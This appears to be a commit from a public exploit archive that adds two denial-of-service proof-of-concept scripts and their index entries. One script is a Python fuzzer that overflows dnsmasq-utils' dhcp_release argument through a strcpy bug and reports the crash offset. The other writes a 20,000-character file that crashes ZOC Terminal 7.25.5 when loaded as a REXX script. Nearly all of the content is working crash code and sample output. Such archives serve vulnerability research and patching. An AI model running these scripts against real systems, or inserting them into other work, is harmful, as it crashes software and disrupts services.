DB: 2020-04-08

2 changes to exploits/shellcodes dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC) ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
2020-04-08 05:01:50 +00:00 · 2020-04-08 05:01:50 +00:00 · 36c65f8dd4
commit 36c65f8dd4
parent 85bef6929f
3 changed files with 61 additions and 0 deletions
--- a/exploits/linux/dos/48301.py
+++ b/exploits/linux/dos/48301.py
@ -0,0 +1,38 @@
+# Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)
+# Date: 2020-04-06
+# Exploit Author: Josue Encinar
+# Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1
+# Version: 2.79 
+# Tested on: Ubuntu 18.04
+
+
+from subprocess import Popen, PIPE
+
+data = ""
+bof = False
+for i in range (1, 200):
+    A = "A"*i
+    data = f"dhcp_release {A} 1 1"
+    try:
+        result = Popen(data, stdout=PIPE, stderr=PIPE, shell=True)
+        error = result.stderr.read().decode()
+        if "Aborted (core dumped)" in error:
+            print("[+] Buffer Overflow detected!")
+            print(f"[*] Offset: {i}")
+            bof = True
+            break
+    except Exception as e:
+        print(f"[-] {e}")
+
+if not bof:
+    print("[-] No buffer overflow...")
+
+
+## Check line 273 in dhcp_release.c 
+### strcpy(ifr.ifr_name, argv[1]);
+#
+## PoC:
+# josue@ubuntu:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py 
+# *** buffer overflow detected ***: dhcp_release terminated
+# [+] Buffer Overflow detected!
+# [*] Offset: 16
--- a/exploits/windows/dos/48302.py
+++ b/exploits/windows/dos/48302.py
@ -0,0 +1,21 @@
+# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.emtec.com
+# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
+# Tested Version: 7.25.5
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "exp.zrx"
+# 2.- Open ZOC Terminal
+# 3.- Select Script > Start REXX Script... 
+# 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open"
+# 5.- Crashed
+
+cod = "\x41" * 20000
+
+f = open('ZOC_7.25.5_Script.zrx', 'w')
+f.write(cod)
+f.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6700,6 +6700,8 @@ id,file,description,date,author,type,platform,port
 48290,exploits/windows/dos/48290.py,"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
 48291,exploits/windows/dos/48291.py,"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
 48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux,
+48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,